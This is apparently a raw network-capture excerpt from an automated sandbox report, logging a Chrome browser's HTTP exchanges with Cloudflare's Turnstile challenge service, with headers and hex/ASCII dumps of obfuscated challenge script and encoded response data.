                                                              2024-07-03 07:40:37 UTC1369INData Raw: 69 7a 28 31 37 36 39 29 2c 67 78 5b 69 7a 28 31 36 39 36 29 5d 3d 69 7a 28 31 34 32 39 29 2c 67 79 3d 7b 7d 2c 67 79 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 35 34 30 29 2c 67 79 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 38 37 31 29 2c 67 79 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 32 31 30 30 29 2c 67 79 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 38 38 30 29 2c 67 79 5b 69 7a 28 31 34 38 35 29 5d 3d 69 7a 28 36 36 34 29 2c 67 79 5b 69 7a 28 31 38 31 32 29 5d 3d 69 7a 28 31 30 33 38 29 2c 67 79 5b 69 7a 28 32 32 33 31 29 5d 3d 69 7a 28 31 37 37 34 29 2c 67 79 5b 69 7a 28 31 34 30 35 29 5d 3d 69 7a 28 31 30 38 35 29 2c 67 79 5b 69 7a 28 31 36 31 38 29 5d 3d 69 7a 28 31 34 39 38 29 2c 67 79 5b 69 7a 28 31 34 39 31 29 5d 3d 69 7a 28 31 38 36 33 29 2c 67 79 5b
                                                              Data Ascii: iz(1769),gx[iz(1696)]=iz(1429),gy={},gy[iz(1997)]=iz(540),gy[iz(903)]=iz(871),gy[iz(1364)]=iz(2100),gy[iz(1544)]=iz(880),gy[iz(1485)]=iz(664),gy[iz(1812)]=iz(1038),gy[iz(2231)]=iz(1774),gy[iz(1405)]=iz(1085),gy[iz(1618)]=iz(1498),gy[iz(1491)]=iz(1863),gy[
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 2c 67 42 5b 69 7a 28 31 31 36 38 29 5d 3d 69 7a 28 32 32 34 32 29 2c 67 42 5b 69 7a 28 37 39 32 29 5d 3d 69 7a 28 31 35 38 37 29 2c 67 42 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 31 34 38 34 29 2c 67 42 5b 69 7a 28 31 30 33 37 29 5d 3d 69 7a 28 31 32 35 34 29 2c 67 42 5b 69 7a 28 32 30 32 32 29 5d 3d 69 7a 28 31 35 39 32 29 2c 67 42 5b 69 7a 28 31 31 31 36 29 5d 3d 69 7a 28 34 38 32 29 2c 67 42 5b 69 7a 28 31 36 39 36 29 5d 3d 69 7a 28 31 30 39 38 29 2c 67 43 3d 7b 7d 2c 67 43 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 31 35 38 35 29 2c 67 43 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 31 37 39 37 29 2c 67 43 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 31 35 32 33 29 2c 67 43 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 31 33 30 35 29 2c 67 43 5b 69 7a 28 31 34 38 35
                                                              Data Ascii: ,gB[iz(1168)]=iz(2242),gB[iz(792)]=iz(1587),gB[iz(842)]=iz(1484),gB[iz(1037)]=iz(1254),gB[iz(2022)]=iz(1592),gB[iz(1116)]=iz(482),gB[iz(1696)]=iz(1098),gC={},gC[iz(1997)]=iz(1585),gC[iz(903)]=iz(1797),gC[iz(1364)]=iz(1523),gC[iz(1544)]=iz(1305),gC[iz(1485
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 29 5d 3d 69 7a 28 31 35 33 31 29 2c 67 46 5b 69 7a 28 31 38 31 32 29 5d 3d 69 7a 28 39 32 36 29 2c 67 46 5b 69 7a 28 32 32 33 31 29 5d 3d 69 7a 28 31 31 30 38 29 2c 67 46 5b 69 7a 28 31 34 30 35 29 5d 3d 69 7a 28 32 31 39 37 29 2c 67 46 5b 69 7a 28 31 36 31 38 29 5d 3d 69 7a 28 32 31 36 35 29 2c 67 46 5b 69 7a 28 31 34 39 31 29 5d 3d 69 7a 28 31 33 32 39 29 2c 67 46 5b 69 7a 28 31 31 36 38 29 5d 3d 69 7a 28 36 36 35 29 2c 67 46 5b 69 7a 28 37 39 32 29 5d 3d 69 7a 28 38 35 38 29 2c 67 46 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 32 35 34 32 29 2c 67 46 5b 69 7a 28 31 30 33 37 29 5d 3d 69 7a 28 35 34 32 29 2c 67 46 5b 69 7a 28 32 30 32 32 29 5d 3d 69 7a 28 35 38 34 29 2c 67 46 5b 69 7a 28 31 31 31 36 29 5d 3d 69 7a 28 31 32 32 38 29 2c 67 46 5b 69 7a 28 31 36
                                                              Data Ascii: )]=iz(1531),gF[iz(1812)]=iz(926),gF[iz(2231)]=iz(1108),gF[iz(1405)]=iz(2197),gF[iz(1618)]=iz(2165),gF[iz(1491)]=iz(1329),gF[iz(1168)]=iz(665),gF[iz(792)]=iz(858),gF[iz(842)]=iz(2542),gF[iz(1037)]=iz(542),gF[iz(2022)]=iz(584),gF[iz(1116)]=iz(1228),gF[iz(16
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 7a 28 31 36 39 36 29 5d 3d 69 7a 28 39 32 37 29 2c 67 4a 3d 7b 7d 2c 67 4a 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 31 33 36 38 29 2c 67 4a 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 32 32 31 32 29 2c 67 4a 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 32 30 31 34 29 2c 67 4a 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 32 33 39 35 29 2c 67 4a 5b 69 7a 28 31 34 38 35 29 5d 3d 69 7a 28 36 39 36 29 2c 67 4a 5b 69 7a 28 31 38 31 32 29 5d 3d 69 7a 28 32 35 34 39 29 2c 67 4a 5b 69 7a 28 32 32 33 31 29 5d 3d 69 7a 28 34 38 35 29 2c 67 4a 5b 69 7a 28 31 34 30 35 29 5d 3d 69 7a 28 31 33 35 38 29 2c 67 4a 5b 69 7a 28 31 36 31 38 29 5d 3d 69 7a 28 32 34 39 33 29 2c 67 4a 5b 69 7a 28 31 34 39 31 29 5d 3d 69 7a 28 37 34 36 29 2c 67 4a 5b 69 7a 28 31 31 36 38 29 5d 3d 69 7a 28
                                                              Data Ascii: z(1696)]=iz(927),gJ={},gJ[iz(1997)]=iz(1368),gJ[iz(903)]=iz(2212),gJ[iz(1364)]=iz(2014),gJ[iz(1544)]=iz(2395),gJ[iz(1485)]=iz(696),gJ[iz(1812)]=iz(2549),gJ[iz(2231)]=iz(485),gJ[iz(1405)]=iz(1358),gJ[iz(1618)]=iz(2493),gJ[iz(1491)]=iz(746),gJ[iz(1168)]=iz(
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 32 32 30 29 2c 67 4d 5b 69 7a 28 37 39 32 29 5d 3d 69 7a 28 36 39 31 29 2c 67 4d 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 31 34 33 39 29 2c 67 4d 5b 69 7a 28 31 30 33 37 29 5d 3d 69 7a 28 32 34 35 38 29 2c 67 4d 5b 69 7a 28 32 30 32 32 29 5d 3d 69 7a 28 32 32 31 37 29 2c 67 4d 5b 69 7a 28 31 31 31 36 29 5d 3d 69 7a 28 31 35 36 34 29 2c 67 4d 5b 69 7a 28 31 36 39 36 29 5d 3d 69 7a 28 32 32 36 36 29 2c 67 4e 3d 7b 7d 2c 67 4e 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 39 32 30 29 2c 67 4e 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 32 31 30 36 29 2c 67 4e 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 31 31 33 30 29 2c 67 4e 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 31 30 35 39 29 2c 67 4e 5b 69 7a 28 31 34 38 35 29 5d 3d 69 7a 28 31 39 30 38 29 2c 67 4e 5b 69 7a 28 31
                                                              Data Ascii: 220),gM[iz(792)]=iz(691),gM[iz(842)]=iz(1439),gM[iz(1037)]=iz(2458),gM[iz(2022)]=iz(2217),gM[iz(1116)]=iz(1564),gM[iz(1696)]=iz(2266),gN={},gN[iz(1997)]=iz(920),gN[iz(903)]=iz(2106),gN[iz(1364)]=iz(1130),gN[iz(1544)]=iz(1059),gN[iz(1485)]=iz(1908),gN[iz(1


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.649739104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:36 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:37 UTC240INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:37 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 61
                                                              Connection: close
                                                              cache-control: max-age=2629800, public
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a7b89c343cb-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:37 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.649740104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:37 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:37 UTC240INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:37 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 61
                                                              Connection: close
                                                              cache-control: max-age=2629800, public
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a7f6d4842ce-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:37 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.649741104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:38 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              Content-Length: 2658
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Content-type: application/x-www-form-urlencoded
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              CF-Challenge: e7db8d6cd2b6574
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Origin: https://challenges.cloudflare.com
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:38 UTC2658OUTData Raw: 76 5f 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 3d 44 6a 43 48 4f 48 6f 48 4d 48 75 48 64 48 39 68 73 42 68 73 2d 4d 47 2d 47 49 63 4a 47 63 73 47 4d 62 49 4c 43 61 73 67 62 73 65 4d 24 49 54 6a 47 79 73 51 68 39 73 51 2d 73 6b 63 37 6c 73 44 61 62 62 73 69 75 73 55 46 73 65 71 2d 47 75 24 48 63 6c 73 24 48 51 31 39 73 51 6b 35 43 73 63 52 61 73 64 45 73 52 43 61 73 50 55 6c 5a 31 54 4e 65 25 32 62 48 61 47 6e 73 24 61 65 72 63 53 4f 41 2d 73 6e 73 77 61 73 33 73 4c 61 63 30 54 51 49 37 2b 44 75 52 6e 59 61 48 43 24 62 4d 43 34 52 61 73 50 68 48 73 33 48 55 64 39 49 48 43 71 73 55 37 73 54 77 2d 49 61 78 48 49 61 55 38 57 24 48 73 62 48 47 33 4a 75 48 73 43 58 61 73 34 71 59 78 54 58 61 4d 32 35 52 66 73 51 59 7a 34 73 47 6b 24 61 73 67 2b 2d 31 4d
                                                              Data Ascii: v_89d53a759ec80cb4=DjCHOHoHMHuHdH9hsBhs-MG-GIcJGcsGMbILCasgbseM$ITjGysQh9sQ-skc7lsDabbsiusUFseq-Gu$Hcls$HQ19sQk5CscRasdEsRCasPUlZ1TNe%2bHaGns$aercSOA-snswas3sLac0TQI7+DuRnYaHC$bMC4RasPhHs3HUd9IHCqsU7sTw-IaxHIaU8W$HsbHG3JuHsCXas4qYxTXaM25RfsQYz4sGk$asg+-1M
                                                              2024-07-03 07:40:38 UTC731INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:38 GMT
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Content-Length: 125760
                                                              Connection: close
                                                              cf-chl-gen: gQ0wHQbmnNHat6j99VWQiDmtk4w12r8tFn3sW6QLS8XoFUAUCttbWuTSd+0t5Xe9i29EriG+yg1JVoBf3rJsfHEkU2xg+OH7s6gTVOstHibz633p9suzbdHgd9WGM9O8Knf9gEuZL4IuAk79WwEHlEzkDP7NO4s2mw+B25j8cBWViybdQyBow0+l2lOe6ICwyFQikMWdFdZSeW0QciGxWzlkHYcihLdn4EbDMcbXez1NZkJPHD7Qa70DgpyAA6699WwmYbhdhgg06GBCVUA3S2vez+L+tX3b6B50i+mpj9UD3560R+ymBwMx5zXpx7wK51/XaAsR+o2+zqvAKNL/i+EBm7z4Or/MA3IxwaGQB6X04UBEFDJkaIE5af+HzU1cfldRasuwyFARfaPymTbI73PobO5WK0eP70NsUey2Yo+JQ2BSkuQpzxcoysoj1MrXly29GzMw+e1gR3MFgOsbbw==$OiS7Ctvv46O/k63Ziy2lwQ==
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a839f63176c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:38 UTC638INData Raw: 78 72 66 41 67 38 75 54 69 35 2b 61 70 72 72 42 7a 63 4f 54 72 38 43 33 79 4b 71 33 71 62 4b 2b 32 74 71 53 73 4d 37 54 75 4a 2b 31 35 39 4c 58 6f 4d 43 2f 34 39 75 71 77 62 33 4a 35 4b 76 32 7a 63 50 54 38 64 62 63 36 50 57 2b 36 2b 72 54 76 67 44 2b 42 4e 34 44 41 65 44 34 35 76 62 4a 36 64 72 6c 35 65 59 56 7a 38 2f 75 45 78 49 62 2b 39 4d 55 39 65 33 70 45 50 72 78 44 79 59 6d 47 50 7a 65 47 78 2f 38 4c 52 6b 6e 41 54 45 62 4a 53 6f 75 4b 53 4c 79 49 79 77 54 42 2f 4d 77 46 77 73 72 51 78 51 50 48 68 30 68 2b 52 72 37 43 51 77 67 49 6b 63 35 48 30 4a 4c 4a 53 6c 48 4c 43 67 6a 49 30 30 33 4b 46 55 32 4d 79 6b 73 58 56 45 69 4a 52 39 69 57 31 4a 73 50 79 51 39 4f 7a 67 77 50 44 78 4e 51 46 5a 43 51 44 4e 37 53 32 56 56 64 47 2b 41 64 56 42 63 55 6e 42
                                                              Data Ascii: xrfAg8uTi5+aprrBzcOTr8C3yKq3qbK+2tqSsM7TuJ+159LXoMC/49uqwb3J5Kv2zcPT8dbc6PW+6+rTvgD+BN4DAeD45vbJ6drl5eYVz8/uExIb+9MU9e3pEPrxDyYmGPzeGx/8LRknATEbJSouKSLyIywTB/MwFwsrQxQPHh0h+Rr7CQwgIkc5H0JLJSlHLCgjI003KFU2MyksXVEiJR9iW1JsPyQ9OzgwPDxNQFZCQDN7S2VVdG+AdVBcUnB
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 78 30 65 36 53 43 6c 36 69 58 6e 32 46 69 69 58 71 4b 62 72 4b 4a 64 32 36 50 67 70 43 4e 68 62 61 57 65 72 57 4e 6d 34 79 7a 6e 4a 6d 32 75 63 4c 45 70 4d 33 41 79 63 47 2f 7a 36 33 52 72 70 4b 6b 73 4c 48 59 6d 62 47 75 72 61 65 57 6d 61 71 77 72 62 4b 68 33 72 33 6b 6f 4c 53 73 70 2b 6e 42 7a 65 76 72 33 36 75 72 39 2b 33 6c 30 72 6e 61 30 4c 76 73 2f 65 44 50 32 4e 45 41 32 50 50 33 30 37 76 6f 34 39 6a 75 43 73 76 50 2f 73 73 42 34 63 76 50 44 52 41 4b 2b 68 44 33 43 51 66 76 44 64 6a 64 34 76 7a 64 39 66 50 32 48 67 76 6a 4c 69 30 51 4c 7a 41 43 48 7a 51 6e 49 44 4c 74 4f 44 41 52 39 76 55 39 39 44 73 68 45 79 35 41 45 43 49 65 42 6a 73 39 51 7a 34 57 42 56 41 4d 4a 43 67 7a 50 41 63 78 56 53 64 53 54 69 6c 4b 53 78 77 38 4c 43 45 69 47 54 73 36 56
                                                              Data Ascii: x0e6SCl6iXn2FiiXqKbrKJd26PgpCNhbaWerWNm4yznJm2ucLEpM3AycG/z63RrpKksLHYmbGuraeWmaqwrbKh3r3koLSsp+nBzevr36ur9+3l0rna0Lvs/eDP2NEA2PP307vo49juCsvP/ssB4cvPDRAK+hD3CQfvDdjd4vzd9fP2HgvjLi0QLzACHzQnIDLtODAR9vU99DshEy5AECIeBjs9Qz4WBVAMJCgzPAcxVSdSTilKSxw8LCEiGTs6V
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 48 5a 4a 2b 52 70 5a 36 62 67 37 52 31 6b 62 47 61 70 49 32 6d 73 70 70 36 6b 4a 4c 41 65 37 4b 6b 74 35 72 45 6f 70 6d 6a 6f 4d 53 45 71 6f 6e 52 78 38 50 53 77 38 36 6c 77 64 71 55 7a 72 75 5a 6c 62 57 76 32 4e 6a 62 77 4f 54 41 31 4b 4b 78 74 38 72 71 6f 2b 58 4e 30 66 4b 2b 33 4d 62 6e 37 4e 62 45 2b 50 54 59 7a 76 33 30 75 73 71 33 33 51 54 32 78 66 6a 78 78 65 6a 34 35 2b 30 4c 37 50 44 6c 2f 66 76 7a 34 4f 58 4d 39 64 45 48 37 42 63 65 44 68 44 57 49 42 45 56 48 51 37 64 42 41 51 52 35 75 67 6c 48 66 62 2b 2b 67 44 72 48 42 7a 77 38 67 55 74 4c 50 63 6b 42 53 55 4f 39 41 41 70 4e 6a 31 44 45 54 55 58 52 78 59 54 4b 79 73 68 47 45 6b 74 48 6b 4a 4e 52 78 4e 57 4d 31 63 74 49 7a 74 56 4d 53 64 4a 55 53 35 53 58 57 4d 35 4f 43 4a 53 4e 30 63 36 52 54
                                                              Data Ascii: HZJ+RpZ6bg7R1kbGapI2mspp6kJLAe7Kkt5rEopmjoMSEqonRx8PSw86lwdqUzruZlbWv2NjbwOTA1KKxt8rqo+XN0fK+3Mbn7NbE+PTYzv30usq33QT2xfjxxej45+0L7PDl/fvz4OXM9dEH7BceDhDWIBEVHQ7dBAQR5uglHfb++gDrHBzw8gUtLPckBSUO9AApNj1DETUXRxYTKyshGEktHkJNRxNWM1ctIztVMSdJUS5SXWM5OCJSN0c6RT
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 69 4b 2b 69 69 61 61 70 67 6e 47 6f 74 36 36 56 6a 5a 57 59 65 34 43 7a 68 49 5a 2b 6b 63 43 6a 6c 37 36 72 6f 72 71 78 73 73 44 4e 78 38 72 41 74 4b 65 72 74 4a 65 2b 32 4b 7a 59 7a 74 33 64 77 64 62 59 35 38 53 2b 34 39 33 72 35 74 76 72 30 4e 37 67 38 2b 7a 4e 37 75 33 49 78 76 48 48 35 4d 76 52 74 38 7a 53 39 72 6f 41 78 4e 44 53 39 65 4b 38 2f 63 4c 75 33 51 45 4a 37 4f 4d 41 36 4d 34 52 46 77 51 5a 37 76 77 63 46 78 51 66 36 66 6e 31 34 65 77 6b 2f 75 49 45 48 69 76 34 2b 77 48 37 2b 65 73 43 4c 53 67 6c 4c 54 41 6d 4f 44 59 4e 42 50 72 39 4f 41 6f 31 49 7a 63 2b 4f 53 51 7a 51 6b 45 7a 47 54 78 46 48 79 51 2f 4d 67 78 4c 54 53 35 58 56 6b 38 35 4b 44 52 50 45 7a 68 4a 46 6c 64 59 50 32 52 62 4f 43 56 64 4a 55 42 55 57 79 5a 70 52 6c 38 6f 62 30 42
                                                              Data Ascii: iK+iiaapgnGot66VjZWYe4CzhIZ+kcCjl76rorqxssDNx8rAtKertJe+2KzYzt3dwdbY58S+493r5tvr0N7g8+zN7u3IxvHH5MvRt8zS9roAxNDS9eK8/cLu3QEJ7OMA6M4RFwQZ7vwcFxQf6fn14ewk/uIEHiv4+wH7+esCLSglLTAmODYNBPr9OAo1Izc+OSQzQkEzGTxFHyQ/MgxLTS5XVk85KDRPEzhJFldYP2RbOCVdJUBUWyZpRl8ob0B
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 33 4b 74 6a 4c 6c 78 64 35 75 32 66 70 4f 57 78 5a 61 53 77 72 61 70 71 36 71 6c 76 49 2b 48 76 4a 2b 78 78 74 47 32 73 4b 69 71 79 73 76 63 76 61 32 65 77 61 72 53 31 4b 48 63 35 73 65 67 36 39 58 47 31 64 33 48 30 4b 66 54 71 63 66 4e 34 4f 33 49 34 74 6e 46 75 39 58 4a 41 4c 62 2b 39 4e 6e 43 33 41 50 43 33 4e 63 46 77 75 72 59 33 64 77 50 32 75 48 4c 79 38 73 56 34 2f 44 34 43 68 62 59 47 76 6e 38 48 77 4c 69 2b 79 41 62 4a 69 6a 39 48 67 49 4b 2b 78 6a 6b 49 78 30 61 49 4f 6f 47 43 51 48 79 4e 69 49 44 4c 50 77 33 50 41 74 43 4c 41 78 46 52 6a 6f 41 50 53 63 41 47 77 49 57 48 44 73 77 4c 7a 4a 54 45 53 38 52 56 6b 6f 75 4a 55 55 71 4a 7a 55 36 59 54 74 56 50 55 34 7a 52 7a 6c 45 49 45 59 6a 51 46 31 47 52 7a 77 35 55 6c 51 7a 59 55 39 47 4c 33 4e 54
                                                              Data Ascii: 3KtjLlxd5u2fpOWxZaSwrapq6qlvI+HvJ+xxtG2sKiqysvcva2ewarS1KHc5seg69XG1d3H0KfTqcfN4O3I4tnFu9XJALb+9NnC3APC3NcFwurY3dwP2uHLy8sV4/D4ChbYGvn8HwLi+yAbJij9HgIK+xjkIx0aIOoGCQHyNiIDLPw3PAtCLAxFRjoAPScAGwIWHDswLzJTES8RVkouJUUqJzU6YTtVPU4zRzlEIEYjQF1GRzw5UlQzYU9GL3NT
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 53 66 76 6f 4b 50 6c 33 2b 2b 6f 5a 76 49 77 4d 61 38 78 4a 37 47 69 72 37 45 6f 35 2f 54 7a 61 79 72 73 74 47 61 7a 63 6a 59 74 38 36 62 76 71 4f 30 35 74 79 37 35 39 54 71 33 61 6e 4b 32 37 37 4d 7a 4e 4c 54 34 74 54 30 74 62 62 52 31 73 33 79 30 66 47 38 32 4e 66 75 2b 62 6a 62 39 39 6e 43 78 76 7a 49 2b 52 41 43 7a 4d 76 6e 31 4f 76 31 37 51 48 79 43 4e 54 7a 2b 41 2f 30 46 50 49 4e 46 68 38 67 41 75 4c 61 4b 66 55 74 39 42 73 70 42 75 49 4b 4d 77 77 42 43 41 6b 4c 38 41 49 49 4f 69 6b 55 4f 44 55 32 4c 53 41 4f 46 51 51 65 4a 68 67 30 52 30 77 5a 4b 78 30 6e 4b 69 49 6e 54 45 34 4e 44 67 38 74 54 42 73 53 46 56 4e 58 4c 7a 4d 75 55 55 38 2b 51 54 73 35 4a 79 70 72 50 6c 70 67 54 45 6c 4e 50 56 52 44 55 55 46 58 62 46 56 57 56 7a 5a 59 4e 57 70 59 56
                                                              Data Ascii: SfvoKPl3++oZvIwMa8xJ7Gir7Eo5/TzayrstGazcjYt86bvqO05ty759Tq3anK277MzNLT4tT0tbbR1s3y0fG82Nfu+bjb99nCxvzI+RACzMvn1Ov17QHyCNTz+A/0FPINFh8gAuLaKfUt9BspBuIKMwwBCAkL8AIIOikUODU2LSAOFQQeJhg0R0wZKx0nKiInTE4NDg8tTBsSFVNXLzMuUU8+QTs5JyprPlpgTElNPVRDUUFXbFVWVzZYNWpYV
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 42 6d 6f 47 33 6e 4a 65 73 78 73 69 6a 69 64 47 6f 70 4c 4b 70 69 71 53 55 71 4e 71 70 76 4a 37 59 76 37 4f 75 31 4e 36 79 73 63 61 30 35 75 66 6c 78 63 72 4d 35 36 72 4b 72 4b 37 41 38 4f 66 35 38 38 6e 56 78 50 7a 4b 7a 4d 72 2b 34 65 4c 4f 31 41 54 56 34 39 58 4a 76 65 4c 56 2b 2b 44 6b 2f 65 6e 75 41 4d 33 6a 36 74 6a 6e 37 39 6b 58 42 75 30 4c 49 4f 33 33 34 4e 73 67 38 69 49 49 39 65 41 66 46 67 73 65 39 2b 38 4e 45 50 34 76 42 78 62 78 39 54 55 6c 44 2f 6f 58 47 43 73 76 43 77 37 38 44 78 4d 5a 4f 79 51 56 4e 30 49 66 4b 43 34 72 52 43 59 6c 4c 45 4d 66 4f 45 67 55 55 43 55 72 54 30 6f 33 58 52 68 54 4d 6c 55 30 47 45 64 68 49 6b 46 6d 51 47 6f 39 4c 31 42 4b 4a 43 35 69 4d 45 70 4d 65 47 52 4f 52 54 4a 47 64 6b 6c 6f 56 7a 70 62 59 54 64 54 56 58
                                                              Data Ascii: BmoG3nJesxsijidGopLKpiqSUqNqpvJ7Yv7Ou1N6ysca05uflxcrM56rKrK7A8Of588nVxPzKzMr+4eLO1ATV49XJveLV++Dk/enuAM3j6tjn79kXBu0LIO334Nsg8iII9eAfFgse9+8NEP4vBxbx9TUlD/oXGCsvCw78DxMZOyQVN0IfKC4rRCYlLEMfOEgUUCUrT0o3XRhTMlU0GEdhIkFmQGo9L1BKJC5iMEpMeGRORTJGdkloVzpbYTdTVX
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 6f 35 76 53 6a 70 76 46 70 64 4b 68 70 36 53 69 32 4c 65 76 33 5a 69 35 6e 74 37 50 6e 4c 76 50 78 71 65 70 79 65 6d 6b 6f 37 6e 4f 71 65 7a 4a 35 38 44 4c 36 66 53 30 7a 74 4c 4e 37 65 6a 56 32 64 6e 5a 42 50 6b 41 35 65 54 79 78 39 50 68 39 77 4c 71 2b 67 6e 67 44 74 48 76 43 4d 34 48 44 38 37 6c 45 39 6b 61 37 76 62 72 41 74 30 4c 42 50 33 78 2f 4f 54 6b 2f 53 6b 41 34 69 44 37 36 53 41 4b 37 42 50 78 43 51 77 7a 45 50 45 63 4b 42 55 65 43 42 77 37 49 42 49 56 46 42 73 78 51 44 45 79 52 69 74 43 51 53 56 4f 4a 56 41 73 49 51 34 67 50 7a 63 76 4a 43 55 30 4b 52 41 79 55 6b 73 77 49 30 4a 42 4d 7a 78 47 55 6c 35 63 5a 54 39 44 4a 6d 34 73 59 54 46 66 51 30 78 79 61 47 78 58 56 6c 74 50 58 32 31 70 56 54 74 59 62 48 31 44 50 6f 64 63 68 45 56 6e 62 57 69
